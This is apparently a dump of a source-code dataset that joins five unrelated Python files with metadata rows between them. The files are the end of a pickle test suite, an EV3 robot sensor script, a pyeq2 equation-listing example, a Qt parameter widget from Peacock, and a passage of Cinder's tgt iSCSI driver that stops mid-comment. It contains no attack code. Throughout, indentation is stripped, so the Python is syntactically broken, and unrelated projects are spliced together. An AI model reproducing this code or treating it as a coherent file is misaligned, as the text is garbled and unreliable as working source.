(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y, (proto, x, s, y))
expected = expected_opcode[proto, len(x)]
self.assertEqual(opcode_in_pickle(expected, s), True)
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[proto, x]
self.assertEqual(opcode_in_pickle(expected, s), True)
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(tuple(x), tuple(y))
self.assertEqual(x.__dict__, y.__dict__)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertTrue(__name__.encode("utf-8") in s1)
self.assertTrue(b"MyList" in s1)
self.assertEqual(opcode_in_pickle(opcode, s1), False)
y = self.loads(s1)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertTrue(__name__.encode("utf-8") not in s2)
self.assertTrue(b"MyList" not in s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
assert isinstance(s, bytes_types)
y = self.loads(s)
self.assertEqual(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_simple_newobj(self):
x = object.__new__(SimpleNewObj) # avoid __init__
x.abc = 666
for proto in protocols:
s = self.dumps(x, proto)
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s), proto >= 2)
y = self.loads(s) # will raise TypeError if __init__ called
self.assertEqual(y.abc, 666)
self.assertEqual(x.__dict__, y.__dict__)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
self.assertEqual(x.foo, y.foo)
self.assertEqual(x.bar, y.bar)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
def test_bad_getattr(self):
x = BadGetattr()
for proto in 0, 1:
self.assertRaises(RuntimeError, self.dumps, x, proto)
# protocol 2 don't raise a RuntimeError.
d = self.dumps(x, 2)
self.assertRaises(RuntimeError, self.loads, d)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Protocol 0 is less strict and also accept iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except (pickle.PickleError):
pass
try:
self.dumps(D(), proto)
except (pickle.PickleError):
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, obj,
"Failed protocol %d: %r != %r"
% (proto, obj, loaded))
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA3)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA4)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA5)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "Set-Cookie: key=value")
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA4)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA6)
# Test classes for reduce_ex
class REX_one(object):
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
# No __reduce_ex__ here, but inheriting it from object
class REX_two(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
# No __reduce__ here, but inheriting it from object
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
# Calling base class method should succeed
class REX_five(object):
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
# This one used to fail with infinite recursion
# Test classes for newobj
class MyInt(int):
sample = 1
class MyLong(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
myclasses = [MyInt, MyLong, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(object):
def __init__(self, a, b, c):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, pickle.dump, 123, f)
finally:
os.remove(TESTFN)
def test_load_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, pickle.dump, 123, f)
finally:
os.remove(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
pickle.dump(data, stream)
stream.seek(0)
unpickled = pickle.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 3)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
pickle.dump(123, f, -1)
pickle.dump(123, file=f, protocol=-1)
pickle.dumps(123, -1)
pickle.dumps(123, protocol=-1)
pickle.Pickler(f, -1)
pickle.Pickler(f, protocol=-1)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(pickle.Pickler):
def __init__(self): pass
class BadUnpickler(pickle.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def test_bad_input(self):
# Test issue4298
s = bytes([0x58, 0, 0, 0, 0x54])
self.assertRaises(EOFError, pickle.loads, s)
# Test issue7455
s = b'0'
self.assertRaises(pickle.UnpicklingError, pickle.loads, s)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
else:
return None
def persistent_load(self, oid):
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
self.id_count = 0
self.load_count = 0
L = list(range(10))
self.assertEqual(self.loads(self.dumps(L)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.load_count, 5)
def test_bin_persistence(self):
self.id_count = 0
self.load_count = 0
L = list(range(10))
self.assertEqual(self.loads(self.dumps(L, 1)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.load_count, 5)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset StringIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and StringIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(3):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
| gpl-3.0 | 7,596,760,899,772,005,000 | 31.299392 | 80 | 0.523479 | false |
yhalk/vw_challenge_ECR | src/ev3/Sensors/sensors.py | 1 | 1535 | import paho.mqtt.client as mqtt
import config
import ev3dev.ev3 as ev3
import IR.IR_control as remoteControl
import ev3control.master as master
from ev3control.messages import *
import time
from MotionCtrl.actuators_simple import actuators
from Sensors.odometry_ev3 import Odometry
#Set IR sensor to remote control mode
ir = remoteControl.InfraredSensor()
ir.mode = "IR-REMOTE"
#Get odometer
odometer = Odometry()
publishable_names_dict = { "IR_control":ir,
config.LARGE_MOTOR_A:actuators[0],
config.LARGE_MOTOR_B:actuators[1],
config.LARGE_MOTOR_D:actuators[2],
config.MEDIUM_MOTOR:actuators[3],
"Odometer":odometer
}
# Make dict where key is sensor name and value
# is a list of all properties of this sensor
items_to_publish = {pub: [] for pub in list(publishable_names_dict.keys())}
for pub_name in list(items_to_publish.keys()):
pub_obj = publishable_names_dict[pub_name]
for member, dtype in pub_obj.__class__.__dict__.items():
if isinstance(dtype, property):
items_to_publish[pub_name].append(member)
def addSensorDevices(client,topic,qos):
#Use same names as in sensors_names_dict
#Add remote controller
master.publish_cmd(client,topic, AddDeviceMessage("IR_control", "remoteControl.InfraredSensor()"),1,qos=qos)
master.publish_cmd(client,topic, SetAttrMessage("IR_control", "mode","IR-REMOTE"),1,qos=qos)
| apache-2.0 | 4,616,542,250,256,086,000 | 35.547619 | 112 | 0.661889 | false |
JMoravec/unkRadnet | fitToCurve/pyeq2/Examples/Complex/ListAllStandardEquations_2D.py | 1 | 1067 | # Version info: $Id: ListAllStandardEquations_2D.py 1 2012-01-07 22:20:43Z [email protected] $
import os, sys, inspect
if os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '../..') not in sys.path:
sys.path.append(os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '../..'))
import pyeq2, pyeq2.ExtendedVersionHandlers
if __name__ == "__main__":
for submodule in inspect.getmembers(pyeq2.Models_2D):
if inspect.ismodule(submodule[1]):
for equationClass in inspect.getmembers(submodule[1]):
if inspect.isclass(equationClass[1]):
for extendedVersionName in ['Default', 'Offset']:
if (-1 != extendedVersionName.find('Offset')) and (equationClass[1].autoGenerateOffsetForm == False):
continue
equation = equationClass[1]('SSQABS', extendedVersionName)
print '2D ' + submodule[0] + ' --- ' + equation.GetDisplayName()
print 'Done.' | bsd-3-clause | 7,471,303,952,131,567,000 | 43.5 | 125 | 0.564199 | false |
backmari/moose | python/peacock/Input/ParamsByType.py | 1 | 5164 | from PyQt5.QtWidgets import QWidget, QComboBox, QStackedWidget
from PyQt5.QtCore import pyqtSignal
from peacock.base.MooseWidget import MooseWidget
from peacock.utils import WidgetUtils
from ParamsByGroup import ParamsByGroup
class ParamsByType(QWidget, MooseWidget):
"""
Has a QComboBox for the different allowed types.
On switching type a new ParamsByGroup is shown.
"""
needBlockList = pyqtSignal(list)
blockRenamed = pyqtSignal(object, str)
changed = pyqtSignal()
def __init__(self, block, **kwds):
"""
Constructor.
Input:
block[BlockInfo]: The block to show.
"""
super(ParamsByType, self).__init__(**kwds)
self.block = block
self.combo = QComboBox()
self.types = []
self.type_params_map = {}
self.table_stack = QStackedWidget()
self.type_table_map = {}
for t in sorted(self.block.types.keys()):
self.types.append(t)
params_list = []
for p in self.block.parameters_list:
params_list.append(self.block.parameters[p])
t_block = self.block.types[t]
for p in t_block.parameters_list:
params_list.append(t_block.parameters[p])
self.type_params_map[t] = params_list
self.combo.addItems(sorted(self.block.types.keys()))
self.combo.currentTextChanged.connect(self.setBlockType)
self.top_layout = WidgetUtils.addLayout(vertical=True)
self.top_layout.addWidget(self.combo)
self.top_layout.addWidget(self.table_stack)
self.setLayout(self.top_layout)
self.user_params = []
self.setDefaultBlockType()
self.setup()
def _syncUserParams(self, current, to):
"""
Sync user added parameters that are on the main block into
each type ParamsByGroup.
Input:
current[ParamsByGroup]: The current group parameter table
to[ParamsByGroup]: The new group parameter table
"""
ct = current.findTable("Main")
tot = to.findTable("Main")
if not ct or not tot or ct == tot:
return
# first remove user params in tot
tot.removeUserParams()
params = ct.getUserParams()
tot.addUserParams(params)
idx = ct.findRow("Name")
if idx >= 0:
name = ct.item(idx, 1).text()
idx = tot.findRow("Name")
if idx >= 0:
tot.item(idx, 1).setText(name)
def currentType(self):
return self.combo.currentText()
def save(self):
"""
Look at the user params in self.block.parameters.
update the type tables
Save type on block
"""
t = self.getTable()
if t:
t.save()
self.block.setBlockType(self.combo.currentText())
def reset(self):
t = self.getTable()
t.reset()
def getOrCreateTypeTable(self, type_name):
"""
Gets the table for the type name or create it if it doesn't exist.
Input:
type_name[str]: Name of the type
Return:
ParamsByGroup: The parameters corresponding to the type
"""
t = self.type_table_map.get(type_name)
if t:
return t
t = ParamsByGroup(self.block, self.type_params_map.get(type_name, self.block.orderedParameters()))
t.needBlockList.connect(self.needBlockList)
t.blockRenamed.connect(self.blockRenamed)
t.changed.connect(self.changed)
self.type_table_map[type_name] = t
self.table_stack.addWidget(t)
return t
def setDefaultBlockType(self):
param = self.block.getParamInfo("type")
if param and param.value:
self.setBlockType(param.value)
elif self.block.types:
self.setBlockType(sorted(self.block.types.keys())[0])
def setBlockType(self, type_name):
if type_name not in self.block.types:
return
t = self.getOrCreateTypeTable(type_name)
t.updateWatchers()
self.combo.blockSignals(True)
self.combo.setCurrentText(type_name)
self.combo.blockSignals(False)
t.updateType(type_name)
current = self.table_stack.currentWidget()
self._syncUserParams(current, t)
self.table_stack.setCurrentWidget(t)
self.changed.emit()
def addUserParam(self, param):
t = self.table_stack.currentWidget()
t.addUserParam(param)
def setWatchedBlockList(self, path, children):
for i in range(self.table_stack.count()):
t = self.table_stack.widget(i)
t.setWatchedBlockList(path, children)
def updateWatchers(self):
for i in range(self.table_stack.count()):
t = self.table_stack.widget(i)
t.updateWatchers()
def getTable(self):
return self.table_stack.currentWidget()
def paramValue(self, name):
for i in range(self.table_stack.count()):
t = self.table_stack.widget(i)
if t.paramValue(name):
return t.paramValue(name)
| lgpl-2.1 | -7,038,259,173,053,225,000 | 32.532468 | 106 | 0.599923 | false |
eharney/cinder | cinder/volume/targets/tgt.py | 1 | 13042 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import textwrap
import time
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from oslo_utils import fileutils
from cinder import exception
from cinder import utils
from cinder.volume.targets import iscsi
LOG = logging.getLogger(__name__)
class TgtAdm(iscsi.ISCSITarget):
"""Target object for block storage devices.
Base class for target object, where target
is data transport mechanism (target) specific calls.
This includes things like create targets, attach, detach
etc.
"""
VOLUME_CONF = textwrap.dedent("""
<target %(name)s>
backing-store %(path)s
driver %(driver)s
%(chap_auth)s
%(target_flags)s
write-cache %(write_cache)s
</target>
""")
def _get_target(self, iqn):
(out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line:
parsed = line.split()
tid = parsed[1]
return tid[:-1]
return None
def _verify_backing_lun(self, iqn, tid):
backing_lun = True
capture = False
target_info = []
(out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line and "Target %s" % tid in line:
capture = True
if capture:
target_info.append(line)
if iqn not in line and 'Target ' in line:
capture = False
if ' LUN: 1' not in target_info:
backing_lun = False
return backing_lun
def _recreate_backing_lun(self, iqn, tid, name, path):
LOG.warning('Attempting recreate of backing lun...')
# Since we think the most common case of this is a dev busy
# (create vol from snapshot) we're going to add a sleep here
# this will hopefully give things enough time to stabilize
# how long should we wait?? I have no idea, let's go big
# and error on the side of caution
time.sleep(10)
(out, err) = (None, None)
try:
(out, err) = utils.execute('tgtadm', '--lld', 'iscsi',
'--op', 'new', '--mode',
'logicalunit', '--tid',
tid, '--lun', '1', '-b',
path, run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error("Failed recovery attempt to create "
"iscsi backing lun for Volume "
"ID:%(vol_id)s: %(e)s",
{'vol_id': name, 'e': e})
finally:
LOG.debug('StdOut from recreate backing lun: %s', out)
LOG.debug('StdErr from recreate backing lun: %s', err)
def _get_iscsi_target(self, context, vol_id):
return 0
def _get_target_and_lun(self, context, volume):
lun = 1 # For tgtadm the controller is lun 0, dev starts at lun 1
iscsi_target = 0 # NOTE(jdg): Not used by tgtadm
return iscsi_target, lun
@utils.retry(putils.ProcessExecutionError)
def _do_tgt_update(self, name):
(out, err) = utils.execute('tgt-admin', '--update', name,
run_as_root=True)
LOG.debug("StdOut from tgt-admin --update: %s", out)
LOG.debug("StdErr from tgt-admin --update: %s", err)
@utils.retry(exception.NotFound)
def create_iscsi_target(self, name, tid, lun, path,
chap_auth=None, **kwargs):
# Note(jdg) tid and lun aren't used by TgtAdm but remain for
# compatibility
# NOTE(jdg): Remove this when we get to the bottom of bug: #1398078
# for now, since we intermittently hit target already exists we're
# adding some debug info to try and pinpoint what's going on
(out, err) = utils.execute('tgtadm',
'--lld',
'iscsi',
'--op',
'show',
'--mode',
'target',
run_as_root=True)
LOG.debug("Targets prior to update: %s", out)
fileutils.ensure_tree(self.volumes_dir)
vol_id = name.split(':')[1]
write_cache = self.configuration.get('iscsi_write_cache', 'on')
driver = self.iscsi_protocol
chap_str = ''
if chap_auth is not None:
chap_str = 'incominguser %s %s' % chap_auth
target_flags = self.configuration.get('iscsi_target_flags', '')
if target_flags:
target_flags = 'bsoflags ' + target_flags
volume_conf = self.VOLUME_CONF % {
'name': name, 'path': path, 'driver': driver,
'chap_auth': chap_str, 'target_flags': target_flags,
'write_cache': write_cache}
LOG.debug('Creating iscsi_target for Volume ID: %s', vol_id)
volumes_dir = self.volumes_dir
volume_path = os.path.join(volumes_dir, vol_id)
if os.path.exists(volume_path):
LOG.debug(('Persistence file already exists for volume, '
'found file at: %s'), volume_path)
utils.robust_file_write(volumes_dir, vol_id, volume_conf)
LOG.debug(('Created volume path %(vp)s,\n'
'content: %(vc)s'),
{'vp': volume_path, 'vc': volume_conf})
old_persist_file = None
old_name = kwargs.get('old_name', None)
if old_name is not None:
LOG.debug('Detected old persistence file for volume '
'%(vol)s at %(old_name)s',
{'vol': vol_id, 'old_name': old_name})
old_persist_file = os.path.join(volumes_dir, old_name)
try:
# With the persistent tgts we create them
# by creating the entry in the persist file
# and then doing an update to get the target
# created.
self._do_tgt_update(name)
except putils.ProcessExecutionError as e:
if "target already exists" in e.stderr:
# Adding the additional Warning message below for a clear
# ER marker (Ref bug: #1398078).
LOG.warning('Could not create target because '
'it already exists for volume: %s', vol_id)
LOG.debug('Exception was: %s', e)
else:
LOG.error("Failed to create iscsi target for Volume "
"ID: %(vol_id)s: %(e)s",
{'vol_id': vol_id, 'e': e})
# Don't forget to remove the persistent file we created
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
# Grab targets list for debug
# Consider adding a check for lun 0 and 1 for tgtadm
# before considering this as valid
(out, err) = utils.execute('tgtadm',
'--lld',
'iscsi',
'--op',
'show',
'--mode',
'target',
run_as_root=True)
LOG.debug("Targets after update: %s", out)
iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
tid = self._get_target(iqn)
if tid is None:
LOG.warning("Failed to create iscsi target for Volume "
"ID: %(vol_id)s. It could be caused by problem "
"with concurrency. "
"Also please ensure your tgtd config "
"file contains 'include %(volumes_dir)s/*'",
{'vol_id': vol_id,
'volumes_dir': volumes_dir, })
raise exception.NotFound()
# NOTE(jdg): Sometimes we have some issues with the backing lun
# not being created, believe this is due to a device busy
# or something related, so we're going to add some code
# here that verifies the backing lun (lun 1) was created
# and we'll try and recreate it if it's not there
if not self._verify_backing_lun(iqn, tid):
try:
self._recreate_backing_lun(iqn, tid, name, path)
except putils.ProcessExecutionError:
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
# Finally check once more and if no go, fail and punt
if not self._verify_backing_lun(iqn, tid):
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
if old_persist_file is not None:
fileutils.delete_if_exists(old_persist_file)
return tid
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
LOG.info('Removing iscsi_target for Volume ID: %s', vol_id)
vol_uuid_file = vol_name
volume_path = os.path.join(self.volumes_dir, vol_uuid_file)
if not os.path.exists(volume_path):
LOG.warning('Volume path %s does not exist, '
'nothing to remove.', volume_path)
return
if os.path.isfile(volume_path):
iqn = '%s%s' % (self.iscsi_target_prefix,
vol_uuid_file)
else:
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
try:
# NOTE(vish): --force is a workaround for bug:
# https://bugs.launchpad.net/cinder/+bug/1159948
utils.execute('tgt-admin',
'--force',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
non_fatal_errors = ("can't find the target",
"access control rule does not exist")
if any(error in e.stderr for error in non_fatal_errors):
LOG.warning("Failed target removal because target or "
"ACL's couldn't be found for iqn: %s.", iqn)
else:
LOG.error("Failed to remove iscsi target for Volume "
"ID: %(vol_id)s: %(e)s",
{'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): There's a bug in some versions of tgt that
# will sometimes fail silently when using the force flag
# https://bugs.launchpad.net/ubuntu/+source/tgt/+bug/1305343
# For now work-around by checking if the target was deleted,
# if it wasn't, try again without the force.
# This will NOT do any good for the case of mutliple sessions
# which the force was aded for but it will however address
# the cases pointed out in bug:
# https://bugs.launchpad.net/cinder/+bug/1304122
if self._get_target(iqn):
try:
LOG.warning('Silent failure of target removal '
'detected, retry....')
utils.execute('tgt-admin',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error("Failed to remove iscsi target for Volume "
"ID: %(vol_id)s: %(e)s",
{'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): This *should* be there still but incase
